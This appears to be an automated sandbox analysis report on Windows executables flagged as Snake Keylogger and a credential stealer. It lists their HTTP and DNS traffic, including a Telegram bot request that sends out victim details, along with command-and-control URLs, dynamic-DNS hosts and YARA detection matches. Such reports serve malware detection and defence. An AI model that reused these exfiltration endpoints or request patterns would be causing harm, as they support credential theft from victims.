Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2014/03/2025%20/%2020:19:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2014/03/2025%20/%2019:30:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.okurkardesler.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 14 Mar 2025 13:44:20 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 14 Mar 2025 13:44:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003475000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003302000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003475000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003485000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003312000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003302000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.okurkardesler.com
Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003475000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003485000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003312000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003302000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://okurkardesler.com
Source: 7495 P.exe, 00000002.00000002.1340523019.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1376684346.0000000002592000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003281000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20a
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003419000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003297000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enP
Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003414000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: 7495 P.exe, 0000000D.00000002.3730302031.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003165000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, HRrXXnBIpL.exe, 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003165000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.000000000336D000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003300000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.0000000003190000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000031FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: 7495 P.exe, 0000000D.00000002.3737265010.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3737265010.000000000456F000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.0000000004438000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3737271731.00000000043FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032D7000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: 7495 P.exe, 0000000D.00000002.3730302031.000000000344A000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003445000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000032D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49761 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large array initializations

Source: 7495 P.exe, DataGridViewFarsiDatePickerCell.cs

Large array initialization: : array initializer size 650699

Source: C:\Users\user\Desktop\7495 P.exe	Code function: 2_2_07BB0040	2_2_07BB0040
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 2_2_07BBE790	2_2_07BBE790
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 2_2_07BBE34A	2_2_07BBE34A
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 2_2_07BB0006	2_2_07BB0006
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 2_2_07BBEBD8	2_2_07BBEBD8
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_03255370	13_2_03255370
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325D278	13_2_0325D278
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_03257118	13_2_03257118
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325C19F	13_2_0325C19F
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325A088	13_2_0325A088
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325C738	13_2_0325C738
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325C468	13_2_0325C468
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325CA08	13_2_0325CA08
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325F974	13_2_0325F974
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_032569A0	13_2_032569A0
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325E988	13_2_0325E988
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325CFA9	13_2_0325CFA9
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325CCD8	13_2_0325CCD8
